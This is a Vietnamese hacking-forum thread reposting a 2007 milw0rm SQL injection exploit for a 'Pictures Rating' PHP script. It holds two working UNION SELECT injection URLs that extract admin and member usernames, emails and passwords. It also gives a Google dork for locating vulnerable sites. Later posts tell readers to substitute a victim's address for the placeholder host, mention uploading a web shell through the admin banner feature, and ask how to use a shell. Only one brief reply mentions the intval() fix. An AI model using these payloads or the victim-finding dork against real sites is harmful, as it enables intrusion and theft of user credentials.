Latest posts for the topic "Pictures Rating SQL Injection Vulnerbility"

Pictures Rating SQL Injection Vulnerbility

BigballVN — GMT

Code:

--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Latest Pictures" Name   Gender   Profile   Rating


DESCRIPTION:
pull out admin/members info


EXPLOITS:
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),5,6,7/**/FROM/**/admin/*
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,email,0x3a,password,0x3c623e),5,6,7/**/FROM/**/members/*


NOTE/TIP:
you must register first
admin login is at /admin/ you can backup the DB there.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-18]

Với chức năng Upload Banner trong CP thì chúng ta có thể upshell lên và... muốn làm gì thì làm :lol:) :P) :P)

Pictures Rating SQL Injection Vulnerbility

lamhoang20002000 — GMT

Server.com fix lỗi này rùi hay sao ấy nhỉ?

Pictures Rating SQL Injection Vulnerbility

BigballVN — GMT

Bạn ơi. Đây chỉ là ví dụ thôi. Bạn phải thay server.com bằng link của victim. Cách tìm victim thì dùng google tìm với nội dung sau:

allintext:"Latest Pictures" Name Gender Profile Rating

Pictures Rating SQL Injection Vulnerbility

minhquan1712 — GMT

trong mấy cái exploit thì nếu có câu dork:.... jì jì đó là cách search site bị dính bug trong google đó.

Re: Pictures Rating SQL Injection Vulnerbility

KINYO — GMT

Lại cái tội quên intval() đây mà.

Pictures Rating SQL Injection Vulnerbility

kimsonha — GMT

Xin lỗi mấy bác ,nhưng em là người mới nhìn đoạn code đó mà chẳng hiểu gì cả,mấy bác chỉ rõ cách dùng được không ạ !

Pictures Rating SQL Injection Vulnerbility

lamhoang20002000 — GMT

Hì, thật lơ đãng, quên mất rằng server.com chỉ là ví dụ.

Pictures Rating SQL Injection Vulnerbility

Nowhereman — GMT

gia nhu' hack chi don gian nhu' vay ? nhi? ke ke ke ? " muon lam gi thi lam " nghe ngon wua' bac' :D .

Re: Pictures Rating SQL Injection Vulnerbility

oldboydhp — GMT

đó chỉ là lý thuyết thôi.Chưs cứ thử thực hành đi rồi biết

Re: Pictures Rating SQL Injection Vulnerbility

phstiger — GMT

Lại cái tội quên intval() đây mà.

Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy?

Re: Pictures Rating SQL Injection Vulnerbility

ngonchan — GMT

phstiger wrote:

Lại cái tội quên intval() đây mà.
Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy?

Bạn nên xem tại đây: http://www.php.net/manual/en/function.intval.php

Re: Pictures Rating SQL Injection Vulnerbility

NEO20L4 — GMT

Bác Bigball nói ngon ăn quá, Em cũng chỉ mới biết úphell lên, chưa biết sử dụng nó ra sao nữa. Nếu các bác nhiết tình xin cho em vài đường chỉ dẫn cách sử dụng shell. Thanks all

Re: Pictures Rating SQL Injection Vulnerbility

cutynhangheo — GMT

Lấy được thông tin admin cũng chẳng làm gì được , pass bi encrypt roài thì có crack cũng là một việc quá đổi mất thời gian và đến lúc đó admin của forum đó cũng fix được bug này roài :))